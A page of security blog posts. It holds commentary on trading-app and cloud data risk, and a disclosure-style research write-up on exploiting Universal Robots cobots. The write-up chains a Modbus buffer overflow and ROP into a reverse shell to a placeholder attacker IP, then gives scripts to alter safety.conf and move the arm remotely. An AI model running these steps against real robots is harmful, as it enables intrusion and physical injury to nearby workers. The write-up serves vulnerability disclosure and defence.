Digging into some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end users or institutions, such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.

Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.

Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
 

In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glanced at two recent reports[10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks in the financial industry, I think these organizations should give accolades to, or at least mention, the security mechanisms the evaluated trading platforms implement. Security controls should equal a competitive advantage.

Conclusions and Recommendations

  • There’s still a long way to go to improve the maturity level of security in mobile trading apps.
  • Desktop and web platforms should also be tested and improved.
  • Regulators should encourage brokers to implement safeguards for a better trading environment.
  • In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
  • Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • End users should enable all of the security mechanisms their apps offer.

Side Thought

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

 
Thanks for reading,
Alejandro
References
[1] Ponzi scheme
[2] “Pump-and-Dumps” and Market Manipulations
[3] Practical Examples Of How Blockchains Are Used In Banking And The Financial Services Sector
[4] Personal banking apps leak info through phone
[5] (In)secure iOS Mobile Banking Apps – 2015 Edition
[6] Shoulder surfing (computer security)
[7] Financial Industry Regulatory Authority: Cybersecurity
[8] Securities Industry and Financial Markets Association: Cybersecurity
[9] U.S. Securities and Exchange Commission: Cybersecurity, the SEC and You
[10] NerdWallet: Best Online Brokers for Stock Trading 2017
[11] StockBrokers: 2017 Online Broker Rankings
INSIGHTS | September 7, 2017

The Other Side of Cloud Data Risk

What I’m writing here isn’t about whether you should be in the cloud or not. That’s a complex question; it’s highly dependent on your business, and experts could still disagree even after seeing all of the inputs.

What I want to talk about is two distinct considerations when looking at the risk of moving your entire company to the cloud. There are many companies doing this, especially in the Bay Area. CRM, HR, Email—it’s all cloud, and the number of cloud vendors totals in the hundreds, perhaps even thousands.

We’re pretty familiar with one type of risk, which is that between the internet and the cloud vendor. That list of risks looks something like this:

  • The vendor is compromised due to a vulnerability
  • An insider at the vendor leaves with a bunch of data and sells or posts it
  • Someone at the vendor misconfigures something and the internet finds it

The list goes on from there.

But the side of that cloud/vendor risk that companies don’t seem to be as aware of is their own insider access: while one risk is that the vendor does something stupid with your data, another is that your own employees do the same.

Considerations around insider access are numerous:

  • Employees with way too much access to sales, customer, employee, financial, and other types of data
  • No ability to know whether that data is being downloaded, by whom, and how much
  • No ability to detect that data on endpoints
  • No control of which endpoints access the data
  • No ability to control where that data is then sent

The situation in so many cloud-based companies is that they enable business by providing access to these cloud systems, but they don’t control which endpoints can reach that data. Users may get in through web apps, mobile apps, or other means. It’s application-based authentication that doesn’t know (or care) what type of device is being used: a 12-year-old desktop with XP on it, or an old Android device that hasn’t been updated in months or years.

Even worse is the false sense of security gained from spending millions on firewall infrastructure, while a massive percentage of the workforce either doesn’t work at the office or doesn’t hairpin back into the office through a VPN. The modern workforce—especially in these types of environments—increasingly connects from a laptop at home (or at a co-work site or coffee shop) directly to the backend, which is the cloud.

This puts us increasingly in a situation where most of the NetSec products we’ve been investing in for the last 15 years are moot, for the simple reason that fewer and fewer people are using the corporate network.

For cloud-based companies especially, it’s time to start thinking about AuthZ and AuthN from not just the user and app perspective, but from a complete endpoint perspective. What is the device, OS, patch levels, malware controls, etc., combined with the user auth, for any given access to an application and the data within?
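In other words, the authorization decision becomes a function of both the user and the device posture. A toy sketch of such a combined check (the fields and thresholds are invented for illustration):

from dataclasses import dataclass

@dataclass
class Endpoint:
    os_version: str
    days_since_last_patch: int
    disk_encrypted: bool
    managed: bool  # enrolled in the company's device management

def authorize(user_authenticated, device):
    # Access requires BOTH a valid user credential and a healthy device;
    # the policy thresholds here are illustrative, not a standard.
    device_ok = (device.managed
                 and device.disk_encrypted
                 and device.days_since_last_patch <= 30)
    return user_authenticated and device_ok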

The risk from a compromised vendor is significant, but it’s also largely outside of a company’s control. Anyone who’s been in security for a while knows that there are thousands of companies with X, Y, or Z certifications, or positive audit results when they absolutely shouldn’t have passed. It’s really hard to know how safe your data is when it’s sitting with hundreds of cloud vendors.

What you can do is to get better control over what your own people are doing with that same data, and that starts with understanding who’s accessing it, and from what devices.

 

PRESENTATION | August 22, 2017

Heavy Trucks and Electronic Logging Devices: What Could Go Wrong?

Former IOActive researcher, Corey Thuen, provides a security overview presentation of the various vulnerabilities affecting the trucking industry systems, with a focus on ELD vulnerabilities. (presentation PDF – Black Hat 2017)

RESEARCH |

Exploiting Industrial Collaborative Robots

Traditional industrial robots are boring. Typically, they are autonomous or operate with limited guidance and execute repetitive, programmed tasks in manufacturing and production settings.1 They are often used to perform duties that are dangerous or unsuitable for workers; therefore, they operate in isolation from humans and other valuable machinery.

This is not the case with the latest generation collaborative robots (“cobots”) though. They function with co-workers in shared workspaces while respecting safety standards. This generation of robots works hand-in-hand with humans, assisting them, rather than just performing automated, isolated operations. Cobots can learn movements, “see” through HD cameras, or “hear” through microphones to contribute to business success.

UR5 by Universal Robots2
Baxter by Rethink Robotics3

So cobots present a much more interesting attack surface than traditional industrial robots. But are cobots only limited to industrial applications? NO, they can also be integrated into other settings!

 
The Moley Robotic Kitchen (2xUR10 Arms)4
DARPA’s ALIAS Robot (UR3 Arm)5
Last February, Cesar Cerrudo (@cesarcer) and I published a non-technical paper “Hacking Robots Before Skynet” previewing our research on several home, business, and industrial robots from multiple well-known vendors. We discovered nearly 50 critical security issues. Within the cobot sector, we audited leading robots, including Baxter/Sawyer from Rethink Robotics and UR by Universal Robots.
  • Baxter/Sawyer: We found authentication issues, insecure transport in their protocols, default deployment problems, susceptibility to physical attacks, and the usage of ROS, a research framework known to be vulnerable to multiple issues. The major problems we reported appear to have been patched by the company in February 2017.
  • UR: We found authentication issues in many of the control protocols, susceptibility to physical attacks, memory corruption vulnerabilities, and insecure communication transport. All of the issues remain unpatched in the latest version (3.4.2.65, May 2017).6

In accordance with IOActive’s responsible disclosure policy we contacted the vendors last January, so they have had ample time to address the vulnerabilities and inform their customers. Our goal is to make cobots more secure and prevent vulnerabilities from being exploited by attackers to cause serious harm to industries, employees, and their surroundings. I truly hope this blog entry moves the collaborative industry forward so we can safely enjoy this and future generations of robots.

In this post, I will discuss how an attacker can chain multiple vulnerabilities in a leading cobot (UR3, UR5, UR10 – Universal Robots) to remotely modify safety settings, violating applicable safety laws and, consequently, causing physical harm to the robot’s surroundings by moving it arbitrarily.

This attack serves as an example of how dangerous these systems can be if they are hacked. Manipulating safety limits and disabling emergency buttons could directly threaten human life. Imagine what could happen if an attack targeted an array of 64 cobots as is found in a Chinese industrial corporation.7

The final exploit abuses six vulnerabilities to change safety limits and disable safety planes and emergency buttons/sensors remotely over the network. The cobot arm swings wildly about, wreaking havoc. This video demonstrates the attack: https://www.youtube.com/watch?v=cNVZF7ZhE-8

Q: Can these robots really harm a person?
A: Yes. A study8 by the Control and Robotics Laboratory at the École de technologie supérieure (ÉTS) in Montreal (Canada) clearly shows that even the smaller UR5 model is powerful enough to seriously harm a person. While running at slow speeds, their force is more than sufficient to cause a skull fracture.9

Q: Wait…don’t they have safety features that prevent them from harming nearby humans?
A: Yes, but they can be hacked remotely, and I will show you how in the next technical section.

Q: Where are these deployed?
A: All over the world, in multiple production environments every day.10

Integrators Define All Safety Settings

Universal Robots is the manufacturer of UR robots. The company that installs UR robots in a specific application is the integrator. Only an integrated and installed robot is considered a complete machine. The integrators of UR robots are responsible for ensuring that any significant hazard in the entire robot system is eliminated. This includes, but is not limited to:11

  • Conducting a risk assessment of the entire system. In many countries this is required by law
  • Interfacing other machines and additional safety devices if deemed appropriate by the risk assessment
  • Setting up the appropriate safety settings in the Polyscope software (control panel)
  • Ensuring that the user will not modify any safety measures by using a “safety password”
  • Validating that the entire system is designed and installed correctly

Universal Robots has recognized potentially significant hazards, which must be considered by the integrator, for example:

  • Penetration of skin by sharp edges and sharp points on tools or tool connectors
  • Penetration of skin by sharp edges and sharp points on obstacles near the robot track
  • Bruising due to stroke from the robot
  • Sprain or bone fracture due to strokes between a heavy payload and a hard surface
  • Mistakes due to unauthorized changes to the safety configuration parameters

Some safety-related features are purposely designed for cobot applications. These features are particularly relevant when addressing specific areas in the risk assessment conducted by the integrator, including:

  • Force and power limiting: Used to reduce clamping forces and pressures exerted by the robot in the direction of movement in case of collisions between the robot and operator.
  • Momentum limiting: Used to reduce high-transient energy and impact forces in case of collisions between robot and operator by reducing the speed of the robot.
  • Tool orientation limiting: Used to reduce the risk associated with specific areas and features of the tool and work-piece (e.g., to avoid sharp edges to be pointed towards the operator).
  • Speed limitation: Used to ensure the robot arm operates at a low speed.
  • Safety boundaries: Used to restrict the workspace of the robot by forcing it to stay on the correct side of defined virtual planes and not pass through them.

Safety planes in action12


Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.

Safety scanner13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide:

“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”

Changing Safety Configurations Remotely

The exploitation process to remotely change the safety configuration is as follows:

Step 1.    Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2.    Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root.
Step 3.    Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4.    Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write down the current checksum value on the hardware, as this is a common best practice (a sketch of the collision idea follows this list).
Step 5.    Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6.    Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.
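The post does not spell out the checksum algorithm used in Step 4, so as a purely illustrative sketch assume a CRC32-style value; appending a few attacker-chosen bytes to the modified safety.conf is then enough to keep the displayed checksum unchanged:

import itertools
import zlib

def force_crc32(data, target):
    # Appending four chosen bytes is always enough to reach any CRC32 value.
    # This naive search illustrates the idea; a real attack computes the
    # suffix algebraically instead of brute-forcing up to 2**32 candidates.
    for suffix in itertools.product(range(256), repeat=4):
        candidate = data + bytes(suffix)
        if zlib.crc32(candidate) == target:
            return candidate
    raise AssertionError("unreachable: some 4-byte suffix always matches")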

By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, though it was cleaner to use the simulator for this example exploit.

Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):
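The original post shows this step with a screenshot. As a rough stand-in, querying UR’s plain-text Dashboard Server (TCP port 29999, famously unauthenticated) might look like the following; the exact command name is an assumption here:

import socket

def remote_version(host, port=29999):
    # The Dashboard Server greets clients with a banner and then accepts
    # newline-terminated text commands from anyone on the network.
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)  # discard the banner
        s.sendall(b"PolyscopeVersion\n")
        return s.recv(1024).decode(errors="replace").strip()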


Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).

The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot into a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.

It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).

The stack buffer overflows in the call to recv, because a user-controlled size determines how many bytes from the socket will be copied into a fixed-size buffer. This is a very common issue.
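From the attacker’s side, triggering the bug amounts to claiming a payload length far larger than the receiver’s stack buffer. A harmless-shaped sketch follows; the MBAP framing is standard Modbus/TCP, while the actual overflow offsets and the ROP payload are omitted:

import socket
import struct

def send_oversized_modbus(host, port=502, size=0x1000):
    # MBAP header: transaction id, protocol id, length, unit id. Both the
    # length field and the data after it are fully attacker-controlled.
    body = b"\x10" + b"A" * size  # function code + oversized payload
    header = struct.pack(">HHHB", 1, 0, len(body) + 1, 0xFF)
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(header + body)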

Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured with randomize_va_space=1 (ASLR), which randomizes the positions of the stack, the virtual dynamic shared object page, and shared memory regions. Moreover, the core binary does not allow any of its segments to be both writable and executable, due to the “No eXecute” (NX) bit.
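Both settings are easy to confirm from a shell on the controller (or in URSim); a quick sketch:

# Hedged sketch: confirm the mitigations described above.
print(open("/proc/sys/kernel/randomize_va_space").read())  # expect "1" (ASLR on)
# Segment permissions (the NX-enforced GNU_STACK entry) can be inspected
# with, e.g., readelf -l on the URControl binary.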

While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.

EDX+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterward: EBX (which is calculated from our previously controlled pointer in EDX) must also point to a structure from which a file descriptor is obtained and later closed with close().

To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.

I wrote some scripts to find a suitable memory address, and 0x83aa1fc turned out to be perfect, since it satisfies both conditions:
  • 0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
  • 0x83aa1fc+0x1014 contains 0 (nearly all of this region is zeroed)
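A minimal sketch of such a search script is shown below. It assumes the static region has been dumped to a flat file; the file name and base address are hypothetical.

import struct

# Hedged sketch: scan a dump of the non-randomized region for an address X
# where *(X+0x2c) looks like a valid pointer and *(X+0x1014) is zero.
REGION_BASE = 0x8300000                          # illustrative base address
data = open("static_region.bin", "rb").read()    # hypothetical dump file

def u32(off):
    return struct.unpack_from("<I", data, off)[0]

for off in range(0, len(data) - 0x1018, 4):
    ptr = u32(off + 0x2c)
    # crude validity check: the pointer must land inside the same mapped region
    if REGION_BASE <= ptr < REGION_BASE + len(data) and u32(off + 0x1014) == 0:
        print(hex(REGION_BASE + off))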
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved return address on the stack was overwritten:


At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used return-oriented programming (ROP); the challenge is to find enough gadgets to set up everything needed for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I built the chain manually.

First, I focus on my ultimate goal: executing a reverse shell that connects back to my machine. One key point when building a remote ROP-based exploit on Linux is system calls. Depending on the quality of the gadgets with int instructions that I find, I may be able to use primitives such as write or dup2 to reuse the already-created socket to return a shell, or other post-exploitation strategies.

In this binary, I found only one int 0x80 instruction, which is used to invoke system calls on x86 Linux. Because this is a one-shot gadget, I can only perform a single system call: I will use execve to execute a program. The int 0x80 instruction requires a register holding the system call number (EAX, in this case 0xb) and a register (EBX) pointing to a special structure. This structure contains an array of pointers, each of which points to one argument of the command to be executed.

Because of how this vulnerability is triggered, I cannot use null bytes (0x00) in the request buffer. This is a problem, because I need to send commands and arguments and also create an array of pointers that ends with a null byte. To overcome this, I send placeholders, such as chunks of 0xFF bytes, and later replace them with 0x00 at runtime via ROP.

In pseudocode, the call would be (it launches a TCP reverse shell):
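(A sketch with placeholder values; the exact command line from the demo is not reproduced here.)

# Pseudocode sketch: a three-pointer argv for execve that spawns a TCP
# reverse shell. ATTACKER_IP and PORT are placeholders.
cmd  = ["/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"]
args = cmd + [NULL]          # the pointer array must end with a null entry
execve(cmd[0], args, NULL)   # EAX = 0xb, EBX -> arguments structure, EDX = 0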
 
 
All the controlled data is on the stack, so first I align the stack pointer (ESP) with my largest controlled section (STAGE 1). I divided the controlled data into two stages, since both sections can potentially hold many ROP gadgets.

As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.

The following gadget (ROP1 0x8220efa) is used to adjust ESP:

 
 
This way, ESP = ESP + EBX - 1 (the STAGE 1 address in the stack), which aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the value 0xfffffec9 (4294966985): when it is added to ESP, the 32-bit result wraps around to the desired address.
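The wraparound is plain two’s-complement arithmetic; a quick sanity check (the stack value is illustrative):

# Hedged sketch: adding 0xfffffec9 equals subtracting 0x137 modulo 2**32.
esp = 0xbfff1000  # illustrative stack pointer value
assert (esp + 0xfffffec9) & 0xFFFFFFFF == (esp - 0x137) & 0xFFFFFFFF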
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
  1. Zero out the \xff\xff\xff\xff placeholder at the end of the arguments structure. This way, execve will know that the arguments are only those three pointers.
  2. Save a pointer to our first command of cmd[] in our arguments structure.
  3. Jump to STAGE 2, because I don’t have much space here.
 

STAGE 2 of the exploit does the following:

  1. Zero out the \xff\xff\xff\xff placeholder at the end of each argument in cmd[].
  2. Save pointers to the 2nd and 3rd arguments of cmd[] in our arguments structure.
  3. Prepare the registers for execve. As seen before, we need:
    1. EBX = *args[]
    2. EDX = 0
    3. EAX = 0xb
  4. Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to run them as root on the robot controller.
 
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity for this file, saving the calculated checksum on disk. The algorithm does not provide any real integrity for the settings, as it is possible to generate collisions or simply calculate new checksum values for modified settings by overriding special files on the filesystem. I reversed how this calculation is made for each safety setting and created an algorithm that replicates it. In the video demo, I did not fake the new CRC value to match the old one (shown at the top-right of the screen), even though this is possible and easy (Step 4).
 
Before modifying any safety settings on the robot, I set up a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This gives me enough time to download, modify, and upload a new safety settings file. The following command sets up the new URControl process. I used Python because it lets me close all of the running process’s file descriptors when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of those file descriptors; they must be closed when the parent URControl process dies (in order to restart and apply the new safety settings).
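A minimal sketch of that respawn helper follows; the URControl path and invocation are assumptions, and the real command from the demo is not reproduced here.

import os
import time

# Hedged sketch: fork a detached child that waits 25 seconds and then starts
# a fresh URControl instance. Closing every inherited descriptor keeps the
# child independent of the reverse shell and of the dying parent process.
if os.fork() == 0:
    os.setsid()                                   # detach from the parent session
    os.closerange(0, 1024)                        # close all inherited descriptors
    time.sleep(25)                                # window to swap in the new safety.conf
    os.execv("/root/URControl", ["URControl"])    # hypothetical path to the controller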
 
 
Now I have 25 seconds to download the current file, modify it, calculate the new CRC, re-upload it, and kill the running URControl process (which still holds the old safety settings). I can programmatically use the kill command to target the current URControl instance (Step 5).
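For example (a sketch; matching on the process name is an assumption):

import subprocess

# Hedged sketch: kill the running URControl instance so the respawn helper's
# fresh copy loads the modified safety.conf.
subprocess.run(["sudo", "pkill", "-f", "URControl"])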
 

Next, I send this command to the URControl service in order to load the new installation I uploaded. I also close any popup that might appear on the UI.
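One way to script this step is through the plain-text Dashboard interface used earlier (a sketch; the command names follow UR’s documented Dashboard Server, and the installation file name is hypothetical):

import socket

# Hedged sketch: ask the Dashboard Server to load the modified installation
# and dismiss any safety popup raised on the teach pendant UI.
s = socket.create_connection(("192.168.1.10", 29999), timeout=5)
s.recv(1024)                                             # consume the banner
s.sendall(b"load installation default.installation\n")   # hypothetical file name
print(s.recv(1024).decode())
s.sendall(b"close safety popup\n")
print(s.recv(1024).decode())
s.close()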

 
Finally, an attacker can simply call the movej function in the URControl service to move the joints remotely, with custom speed and acceleration (Step 6). This is shown at the end of the video.
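For instance, a one-line URScript program sent over the robot’s script interface would do it (a sketch; port 30002 is UR’s documented secondary client interface, and the joint values, acceleration, and velocity are arbitrary):

import socket

# Hedged sketch: send a URScript movej command straight to the controller.
# Joint angles are in radians; a and v set acceleration and velocity.
script = b"movej([0.0, -1.0, 1.0, 0.5, 0.0, 0.0], a=3.0, v=3.0)\n"
s = socket.create_connection(("192.168.1.10", 30002), timeout=5)
s.sendall(script)
s.close()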

Once again, I see novel and expensive technology that is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
What are we waiting for?
 
1 https://www.robots.com/faq/show/what-is-an-industrial-robot
2 https://www.roboticsbusinessreview.com/manufacturing/cobot-market-boom-lifts-universal-robots-fortunes-2016/
3 http://www.rethinkrobotics.com/blog/humans-and-collaborative-robots-working-together-in-grand-rapids-mi/ and https://www.youtube.com/watch?v=G6_LCwu7dOg
4 https://www.wired.com/2016/11/darpa-alias-autonomous-aircraft-aurora-sikorsky/
5 https://www.universal-robots.com/how-tos-and-faqs/faq/ur-faq/release-note-software-version-34xx/
6 https://www.youtube.com/watch?v=PtncirKiBXQ&t=1s
7 http://coro.etsmtl.ca/blog/?p=299
8 http://www.forensicmed.co.uk/pathology/head-injury/skull-fracture/
9 https://www.universal-robots.com/case-stories/
11 https://academy.universal-robots.com
12 https://academy.universal-robots.com
13 Software_Manual_en_US.pdf – Universal Robots
